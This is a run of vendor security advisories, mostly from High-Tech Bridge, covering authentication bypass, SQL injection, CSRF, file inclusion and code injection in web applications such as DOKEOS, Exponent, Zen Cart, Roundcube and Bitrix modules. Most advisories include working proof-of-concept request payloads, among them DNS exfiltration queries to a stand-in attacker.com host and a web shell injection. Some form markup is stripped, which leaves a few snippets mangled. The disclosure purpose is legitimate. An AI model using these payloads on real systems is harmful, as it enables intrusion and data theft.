Tested Version: ce30
Advisory Publication: January 7, 2016 [without technical details]
Vendor Notification: January 7, 2016
Public Disclosure: February 17, 2016
Vulnerability Type: Improper Authentication [CWE-287]
Risk Level: High
CVSSv3 Base Score: 7.3 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L]
Discovered and Provided: High-Tech Bridge Security Research Lab (
https://www.htbridge.com/advisory/ )
---
Advisory Details:
High-Tech Bridge Security Research Lab discovered a high-risk vulnerability in
a popular e-learning software DOKEOS. A remote unauthenticated attacker can
bypass authentication process and login to the vulnerable website with an
arbitrary account (including administrator's one). Successful exploitation
requires Single Sign-On (SSO) authentication to be enabled.
The vulnerability is caused by variable type confusion error when comparing
password hash to unserialized string during authentication process, when SSO
authentication is enabled (sso_authentication=true). In this case, the
application uses HTTP GET "sso_cookie" parameter to pass base64-encoded login
and password and then calls 'unserialize()' PHP function on received data.
Below is an example of vulnerable code, which erroneously uses the "=="
operator to compare two strings (instead of the "===" operator):
if ($sso['secret'] == sha1($uData['password']) && ($sso['username'] ==
$uData['username'])) {
In this case, SHA1 password hash is compared to $sso['secret'] string,
controlled by the attacker. If attacker passes Boolean true instead of the real
password, he can successfully bypass the authentication and login under
arbitrary web application account.
A simple exploit below can be used to authenticate under "admin" account:
http://[host]/index.php?loginFailed=1_referer=_cookie=YToyOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjY6InNlY3JldCI7YjoxO30=
The "YToyOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjY6InNlY3JldCI7YjoxO30="
string is translated from base64 into:
a:2:{s:8:"username";s:5:"admin";s:6:"secret";b:1;}
After the execution of 'unserialize()' function, we have the following array:
$sso['username'] = 'admin';
$sso['secret'] = true;
---
Solution:
Disclosure timeline:
2016-01-07 Vendor notified via contact form, no reply.
2016-01-13 Vendor notified via contact form, emails and twitter, no reply.
2016-01-20 Vendor notified via contact form and emails, no reply.
2016-01-27 Fix Requested via contact form and emails, no reply.
2016-02-03 Fix Requested via contact form and emails, no reply.
2016-02-17 Public disclosure.
Currently we are not aware of any official solution for this vulnerability.
---
References:
[1] High-Tech Bridge Advisory HTB23289 -
https://www.htbridge.com/advisory/HTB23289 - SSO Auth Bypass and Website
Takeover in DOKEOS
[2] DOKEOS - http://www.dokeos.com/ - E-LEARNING suite and LMS for growing
companies
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to
developers and security practitioners, CWE is a formal list of software
weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by
High-Tech Bridge for on-demand and continuous web application security,
vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL
implementation for PCI DSS and NIST compliance. Supports all types of protocols.
---
Disclaimer: The information provided in this Advisory is provided "as is" and
without any warranty of any kind. Details of this Advisory may be updated in
order to provide as accurate information as possible. The latest version of the
Advisory is available on web page [1] in the References.
SQL Injection in webSPELL
Advisory ID: HTB23291 Product: webSPELL Vendor: webSPELL.org Vulnerable Version(s): 4.2.4 and probably prior Tested Version: 4.2.4 Advisory Publication: January 22, 2016 [without technical details] Vendor Notification: January 22, 2016 Vendor Patch: February 12, 2016 Public Disclosure: February 17, 2016 Vulnerability Type: SQL Injection [CWE-89] Risk Level: Medium CVSSv3 Base Score: 6.3 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L] Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered two vulnerabilities in a popular CMS webSPELL developed for the needs of esport related communities. The vulnerability allows a remote authenticated attacker with cashbox access privileges to execute arbitrary SQL commands in application’s database and completely compromise the vulnerable website. This vulnerability can be also exploited by non-authenticated and unprivileged attacker via the CSRF vector, to which the system is also prone. The vulnerability exists due to insufficient filtration of user-supplied data passed via "payid" HTTP POST parameter to "/cash_box.php" script. A remote authenticated attacker, with cashbox access privileges, can alter the present SQL query and execute arbitrary SQL commands in application’s database. A simple exploit below uses a time-based SQL injection technique to determine current version of MySQL server. The page will be loaded with some delay, if the current MySQL server version is 5.x: http://[host]/cash_box.php; method="post" name="main"> This vulnerability can be also exploited via CSRF vector, as the "/cash_box.php" script does not validate origin of HTTP request before processing user-supplied data in SQL query. --- Solution: Update to webSPELL 4.2.5 More Information: https://github.com/webSPELL/webSPELL/issues/309 --- References: [1] High-Tech Bridge Advisory HTB23291 - https://www.htbridge.com/advisory/HTB23291 - SQL Injection in webSPELL [2] webSPELL - https://www.webspell.org/ - webSPELL is a free content management system under GNU GPL for creating websites easily [3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance. [5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols. --- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
SQL Injection in TestLink
Advisory ID: HTB23288 Product: TestLink Vendor: TestLink Development Team Vulnerable Version(s): 1.9.14 and probably prior Tested Version: 1.9.14 Advisory Publication: January 7, 2016 [without technical details] Vendor Notification: January 7, 2016 Vendor Patch: January 9, 2016 Public Disclosure: February 17, 2016 Vulnerability Type: SQL Injection [CWE-89] Risk Level: High CVSSv3 Base Score: 7.3 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L] Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered high-risk SQL injection vulnerability in TestLink Open Source Test Management. The vulnerability can be exploited to alter the present SQL query and gain access to potentially sensitive information or even to completely compromise the vulnerable web application. The vulnerability is caused by insufficient filtration of "apikey" HTTP GET parameter, passed to "lnl.php" PHP script. A remote unauthenticated attacker can inject and execute arbitrary SQL commands in application's database. A simple exploit code below will display version of used MySQL server: http://[host]/lnl.php?apikey=123999%27%20OR%201=%28IF%28MID%28version%28%29,1,1%29%20LIKE%205,%201,0%29%29%20--%202 --- Solution: Update to TestLink 1.9.15 More Information: http://mantis.testlink.org/view.php?id=7402 --- References: [1] High-Tech Bridge Advisory HTB23288 - https://www.htbridge.com/advisory/HTB23288 - SQL Injection in TestLink [2] TestLink - http://testlink.org/ - TestLink Open Source Test Management [3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance. [5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols. --- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
RCE via CSRF in osCmax
Advisory ID: HTB23285 Product: osCmax Vendor: http://oscmax.com/ Vulnerable Version(s): 2.5.4 and probably prior Tested Version: 2.5.4 Advisory Publication: December 21, 2015 [without technical details] Vendor Notification: December 21, 2015 Public Disclosure: February 17, 2016 Vulnerability Type: PHP File Inclusion [CWE-98] Risk Level: Medium CVSSv3 Base Score: 5.8 [CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:L] Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered 2 PHP Local File Inclusion vulnerabilities in osCmax, a popular web-based e-commerce application and shopping cart. The vulnerabilities can be exploited to execute arbitrary PHP code on the target system. Successful exploitation of these vulnerabilities requires attacker to have access to the administrator panel. However, both vulnerabilities can also be exploited by remote non-authenticated attacker via CSRF attack vector to which the application is also vulnerable. 1) Remote Code Execution via PHP File Inclusion in osCmax 1.1 The vulnerability exists due to insufficient filtration of "pm_filename" HTTP POST parameter in "/admin/page_modules_configuration.php" PHP script. A remote authenticated attacker can use path traversal sequences (e.g. "../../") to included and execute a PHP file from arbitrary location on the local file system. A simple CSRF exploit below can be used to store in the application database path to "/tmp/file" file (or any other file with malicious PHP code): http://[host]/admin/page_modules_configuration.php?page=1 =insert" method="post" name="main"> document.main.submit(); The code from the "/tmp/file" file will be executed once the victim visits the following URL: http://[host]/index.php 1.2 The second vulnerability exists due to insufficient filtration of "file_type" HTTP POST parameter in "/admin/batch_print.php" script. A remote authenticated attacker can use path traversal to load and execute a PHP file from arbitrary location on the local filesystem. A simple CSRF exploit below can be used to execute PHP code from "/tmp/file" file: http://[host]/admin/batch_print.php?act=1; method="post" name ="main"> document.main.submit(); The malicious PHP code will be executed on the server once the victim visits the page with above-mentioned CSRF exploit. --- Solution: Disclosure timeline: 2015-12-21 Vendor notified via emails, no reply. 2016-01-06 Vendor notified via emails and forum, no reply. 2016-01-13 Fix Requested via emails, no reply. 2016-01-19 Fix Requested via emails, no reply. 2016-01-20 Fix Requested via emails, no reply. 2016-02-17 Public disclosure. Currently we are not aware of any official solution for this vulnerability. --- References: [1] High-Tech Bridge Advisory HTB23285 - https://www.htbridge.com/advisory/HTB23285 - RCE via CSRF in osCmax [2] osCmax - http://oscmax.com/ - osCmax is a powerful e-commerce/shopping cart web application. osCmax has all the features needed to run a successful internet store and can be customized to whatever configuration you need. [3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance. [5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols. --- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
BFS-SA-2016-001: FireEye Detection Evasion and Whitelisting of Arbitrary Malware
Vendor: FireEye, https://www.fireeye.com Affected Product: FireEye FX, AX, NX, EX Affected Version: FX < 7.5.1, AX < 7.7.0, NX < 7.6.1, EX < 7.6.2 Severity: High Title: Detection Evasion and Whitelisting of Arbitrary Malware An analysis engine evasion was identified which allows an attacker to completely bypass FireEye's virtualization-based dynamic analysis on Windows and add arbitrary binaries to the internal white list of binaries for which the analysis will be skipped until the white list entry is wiped after a day. This effectively allows an attacker to simply whitelist a binary before using it in a targeted attack without fear of detection. FireEye has released software updates to address the issue. The full advisory with technical details is available at the following link: https://labs.bluefrostsecurity.de/advisories/bfs-sa-2016-001/
Remote Code Execution in Exponent
Advisory ID: HTB23290 Product: Exponent Vendor: http://www.exponentcms.org/ Vulnerable Version(s): 2.3.7 and probably prior Tested Version: 2.3.7 Advisory Publication: January 13, 2016 [without technical details] Vendor Notification: January 13, 2016 Vendor Patch: January 23, 2016 Public Disclosure: February 3, 2016 Vulnerability Type: Code Injection [CWE-94] CVE Reference: CVE-2016-2242 Risk Level: Critical CVSSv3 Base Score: 10 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H] Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered critical vulnerability in Exponent CMS, which can be exploited to inject and execute arbitrary PHP code on the vulnerable system with the privileges of the web server. The vulnerability resides within "/install/index.php" script, when handling user-input data passed via "sc" HTTP POST parameter. The script is not deleted by default after installation of the web application. A remote unauthenticated attacker can permanently inject arbitrary PHP code into "/framework/conf/config.php" configuration file and execute it with privileges of the web server. The attacker will be able to run arbitrary system commands, gain complete control over the vulnerable website, its databases and even compromise the entire web server. A simple exploit below will modify "/framework/conf/config.php" file and inject simple web shell into it: http://[host]/install/index.php; method="post" name="main"> After successful PHP code injection, the attacker can execute arbitrary system command viathe web shell. The following example will display output of "/bin/ls" command for the current directory: http://[host]/index.php?,%27=ls --- Solution: Apply Patch #3 to Exponent CMS v2.3.7 More Information: https://exponentcms.lighthouseapp.com/projects/61783-exponent-cms/tickets/1345-exponent-security-vulnerability-notification http://www.exponentcms.org/news/security-notice-closing-an-exponent-security-vulnerability http://www.exponentcms.org/news/patch-3-released-for-v2-3-7 --- References: [1] High-Tech Bridge Advisory HTB23290 - https://www.htbridge.com/advisory/HTB23290 - Remote Code Execution in Exponent [2] Exponent - http://www.exponentcms.org/ - Exponent is a website content management system (or CMS) that allows site owners to easily create and manage dynamic websites without necessarily directly coding web pages, or managing site navigation. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. --- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Remote Code Execution in Roundcube
Advisory ID: HTB23283 Product: Roundcube Vendor: Roundcube.net Vulnerable Version(s): 1.1.3 and probably prior Tested Version: 1.1.3 Advisory Publication: December 21, 2015 [without technical details] Vendor Notification: December 21, 2015 Vendor Patch: December 26, 2015 Public Disclosure: January 13, 2016 Vulnerability Type: Path Traversal [CWE-22] CVE Reference: CVE-2015-8770 Risk Level: Medium CVSSv3 Base Score: 5.3 [CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:L] Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered a path traversal vulnerability in a popular webmail client Roundcube. Vulnerability can be exploited to gain access to sensitive information and under certain circumstances to execute arbitrary code and totally compromise the vulnerable server. The vulnerability exists due to insufficient sanitization of "_skin" HTTP POST parameter in "/index.php" script when changing between different skins of the web application. A remote authenticated attacker can use path traversal sequences (e.g. "../../") to load a new skin from arbitrary location on the system, readable by the webserver. A simple exploit below will send HTTP POST request to vulnerable script and will load a new skin from "/tmp" folder: http://[HOST]/; method="post" name="main"> Exploitation of the vulnerability requires valid user credentials and ability to create files on vulnerable host. Using specially crafted skin for Roundcube, a remote attacker can gain access to potentially sensitive information. The following code in skin files will display database access credentials: In case, when "skin_include_php" parameter is set to true, the attacker will be able to execute arbitrary PHP code from the skin files: $config['skin_include_php'] = true; This vulnerability is difficult to exploit since it requires ability to create files on the web server and a valid Roundcube account. But this situation is very common for shared hosting servers, that host clients' websites on the same server as Roundcube. --- Solution: Update to Roundcube 1.1.4 https://roundcube.net/news/2015/12/26/updates-1.1.4-and-1.0.8-released/ --- References: [1] High-Tech Bridge Advisory HTB23283 - https://www.htbridge.com/advisory/HTB23283 - RCE in Roundcube [2] Roundcube - https://roundcube.net/ - Free and Open Source Webmail Software [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. --- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Multiple SQL Injection Vulnerabilities in mcart.xls Bitrix Module
Advisory ID: HTB23279 Product: mcart.xls Bitrix module Vendor: www.mcart.ru Vulnerable Version(s): 6.5.2 and probably prior Tested Version: 6.5.2 Advisory Publication: November 18, 2015 [without technical details] Vendor Notification: November 18, 2015 Public Disclosure: January 13, 2016 Vulnerability Type: SQL Injection [CWE-89] CVE Reference: CVE-2015-8356 Risk Level: Medium CVSSv3 Base Score: 6.3 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L] Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered multiple SQL Injection vulnerabilities in mcart.xls Bitrix module, which can be exploited to execute arbitrary SQL queries and obtain potentially sensitive data, modify information in database and gain complete control over the vulnerable website. All discovered vulnerabilities require that the attacker is authorized against the website and has access to vulnerable module. However the vulnerabilities can be also exploited via CSRF vector, since the web application does not check origin of received requests. This means, that a remote anonymous attacker can create a page with CSRF exploit, trick victim to visit this page and execute arbitrary SQL queries in database of vulnerable website. 1. Input passed via the "xls_profile" HTTP GET parameter to "/bitrix/admin/mcart_xls_import.php" script is not properly sanitised before being used in SQL query. A remote authenticated attacker can manipulate SQL queries by injecting arbitrary SQL code. The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP address for `version()` (or any other sensitive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker): http://[host]/bitrix/admin/mcart_xls_import.php?del_prof_real=1_profile=%27%20OR%201=(select%20load_file(CONCAT(CHAR(92),CHAR(92),(select%20version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114+--+ 2. Input passed via the "xls_profile" HTTP GET parameter to "/bitrix/admin/mcart_xls_import.php" script is not properly sanitised before being used in SQL query. A remote authenticated attacker can manipulate SQL queries by injecting arbitrary SQL code. A simple exploit below will write "" string into "/var/www/file.php" file: http://[host]/bitrix/admin/mcart_xls_import.php?xls_profile=%27%20UNION%20SELECT%201,%27%3C?%20phpinfo%28%29;%20?%3E%27,3,4,5,6,7,8,9,0%20INTO%20OUTFILE%20%27/var/www/file.php%27%20--%202 Successful exploitation requires that the file "/var/www/file.php" is writable by MySQL system account. 3. Input passed via the "xls_iblock_id", "xls_iblock_section_id", "firstRow", "titleRow", "firstColumn", "highestColumn", "sku_iblock_id" and "xls_iblock_section_id_new" HTTP GET parameters to "/bitrix/admin/mcart_xls_import_step_2.php" script is not properly sanitised before being used in SQL query. A remote authenticated attacker can manipulate SQL queries by injecting arbitrary SQL code. Below is a list of exploits for each vulnerable parameter. The exploits are based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP address for `version()` (or any other sensitive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker): "xls_iblock_id": http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y_translit_code=Y_iblock_id=0,0,0,0,0,0,0,0,0,(select%20load_file(CONCAT(CHAR(92),CHAR(92),(select%20version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114%29+--+_iblock_section_id=0_IDENTIFY=0=0=0=0=0_GLOBALS=0_iblock_id=1_link_code=1_iblock_section_id_new=0 "xls_iblock_section_id" http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y_translit_code=Y_iblock_id=0_iblock_section_id=0,0,(select%20load_file(CONCAT(CHAR(92),CHAR(92),(select%20version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114%29+--+_IDENTIFY=0=0=0=0=0_
RCE in Zen Cart via Arbitrary File Inclusion
Advisory ID: HTB23282 Product: Zen Cart Vendor: Zen Ventures, LLC Vulnerable Version(s): 1.5.4 Tested Version: 1.5.4 Advisory Publication: November 25, 2015 [without technical details] Vendor Notification: November 25, 2015 Vendor Patch: November 26, 2015 Public Disclosure: December 16, 2015 Vulnerability Type: PHP File Inclusion [CWE-98] CVE Reference: CVE-2015-8352 Risk Level: Critical CVSSv3 Base Score: 9.0 [CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H] Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered critical vulnerability in a popular e-commerce software Zen Cart, which can be exploited by remote non-authenticated attackers to compromise vulnerable system. A remote unauthenticated attacker might be able to execute arbitrary PHP code on the target system, run arbitrary system commands, gain complete access to application's database and obtain information of all website users. The vulnerability exists due to absence of filtration of directory traversal sequences in "act" HTTP GET parameter in "/ajax.php" script, when including local PHP files using 'require()' PHP function. A remote unauthenticated attacker can include and execute arbitrary PHP code on the target system with privileges of the web server. A simple exploit below will include file "/tmp/file.php" and execute its content: http://[host]/ajax.php?method=1=/../../../../tmp/file --- Solution: Apply vendor's patch. More Information: https://www.zen-cart.com/showthread.php?218914-Security-Patches-for-v1-5-4-November-2015 --- References: [1] High-Tech Bridge Advisory HTB23282 - https://www.htbridge.com/advisory/HTB23282 - RCE in Zen Cart via Arbitrary File Inclusion [2] Zen Cart - https://www.zen-cart.com/ - Zen Cart® truly is the art of e-commerce; free, user-friendly, open source shopping cart software. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. --- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
SQL Injection in orion.extfeedbackform Bitrix Module
Advisory ID: HTB23280 Product: orion.extfeedbackform Bitrix module Vendor: www.orion-soft.ru Vulnerable Version(s): 2.1.2 and probably prior Tested Version: 2.1.2 Advisory Publication: November 18, 2015 [without technical details] Vendor Notification: November 18, 2015 Vendor Patch: December 11, 2015 Public Disclosure: December 16, 2015 Vulnerability Type: SQL Injection [CWE-89] CVE Reference: CVE-2015-8355 Risk Level: Medium CVSSv3 Base Score: 6.3 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L] Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered two vulnerabilities in orion.extfeedbackform Bitrix module, can be exploited to execute arbitrary SQL queries and obtain potentially sensitive data, modify information in database and gain complete control over the vulnerable website. All discovered vulnerabilities require that the attacker is authorized against the website and has access to vulnerable module. However the vulnerabilities can be also exploited via CSRF, since the web application does not check origin of received requests. This means, that a remote anonymous attacker can create a page with CSRF exploit, trick victim to visit this page and execute arbitrary SQL queries in database of vulnerable website. The vulnerability exists due to insufficient filtration of input data passed via the "order" and "by" HTTP GET parameters to "/bitrix/admin/orion.extfeedbackform_efbf_forms.php" script. A remote authenticated attacker can manipulate SQL queries by injecting arbitrary SQL code. Below are two exploits for each vulnerable parameter. They are based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP address for `version()` (or any other sensitive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker). "order": http://[host]/bitrix/admin/orion.extfeedbackform_efbf_forms.php?by=ID,%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29, %28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29, CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29, CHAR%28111%29,CHAR%28109%29,CHAR%2892%29, CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29, CHAR%28114%29%29%29%29+--+ "by": http://[host]/bitrix/admin/orion.extfeedbackform_efbf_forms.php?order=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29, %28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29, CHAR%28101%29,CHAR%28114%29,CHAR%2846%29, CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29, CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29, CHAR%28114%29%29%29%29+--+ --- Solution: Update to orion.extfeedbackform 2.1.3 --- References: [1] High-Tech Bridge Advisory HTB23280 - https://www.htbridge.com/advisory/HTB23280 - SQL Injection in orion.extfeedbackform Bitrix module [2] orion.extfeedbackform - https://marketplace.1c-bitrix.ru/solutions/orion.extfeedbackform/ - Bitrix module for feedback forms. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. --- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Path Traversal via CSRF in bitrix.xscan Bitrix Module
Advisory ID: HTB23278 Product: bitrix.xscan Bitrix module Vendor: Bitrix Vulnerable Version(s): 1.0.3 and probably prior Tested Version: 1.0.3 Advisory Publication: November 18, 2015 [without technical details] Vendor Notification: November 18, 2015 Vendor Patch: November 24, 2015 Public Disclosure: December 9, 2015 Vulnerability Type: Path Traversal [CWE-22] CVE Reference: CVE-2015-8357 Risk Level: Medium CVSSv3 Base Score: 4.2 [CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:L] Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered vulnerability in bitrix.xscan Bitrix module, intended to discover and neutralize malware on the website. The vulnerability can be exploited to change extension of arbitrary PHP files on the target system and gain access to potentially sensitive information, such as database credentials, or even make the whole website inaccessible. The vulnerability exists due to absence of filtration of directory traversal characters (e.g. "../") passed via "file" HTTP GET parameter to "/bitrix/admin/bitrix.xscan_worker.php" script. A remote authenticated attacker can upload a file with malicious contents, pass this file to vulnerable script along with name of the file to rename. As a result, the vulnerable script will change extension of the given file from ".php" to ".ph_”. These actions will make the web server treat this file as a text file and display its contents instead of executing it. To demonstrate the vulnerability follow the steps below: 1) Chose arbitrary image file and modify it by appending eval() PHP function at the end of the file. We need this, because the file will be renamed only if it contains potentially dangerous content. 2) Upload this file using standard CMS functionality, for example as an image for your profile. 3) Obtain the name of the image you have uploaded. You can do it using your profile. In our example the images had the following path: "/upload/main/77f/image.jpg". 4) Construct the exploit payload using path to the image and the file you want to view. As a demonstration we chose to view contents of "/bitrix/.settings.php" file, since it contains database credentials: file=/upload/main/77f/image.jpg../../../../../bitrix/.settings.php 5) Use the following PoC code to reproduce the vulnerability: http://[host]/admin/bitrix.xscan_worker.php?action=prison=/upload/main/77f/image.jpg../../../../../bitrix/.settings.php;> As a result, the vulnerable script will rename "/bitrix/.settings.php" into "/bitrix/.settings.ph_", which makes it readable by anonymous users: http://[host]/bitrix/.settings.ph_ Access to vulnerable modules requires administrative privileges, however the vulnerability can be used by anonymous users via CSRF vector. Steps 1-4 do not require administrative or special privileges and can be performed by any user, who can register at the website or upload an image. --- Solution: Update to bitrix.xscan module 1.0.4 --- References: [1] High-Tech Bridge Advisory HTB23278 - https://www.htbridge.com/advisory/HTB23278 - Path Traversal and CSRF in bitrix.xscan Bitrix Module [2] bitrix.xscan - https://marketplace.1c-bitrix.ru/solutions/bitrix.xscan/ - Module for Bitrix CMS that can detect Trojans on your website. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. --- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
PHP File Inclusion in bitrix.mpbuilder Bitrix Module
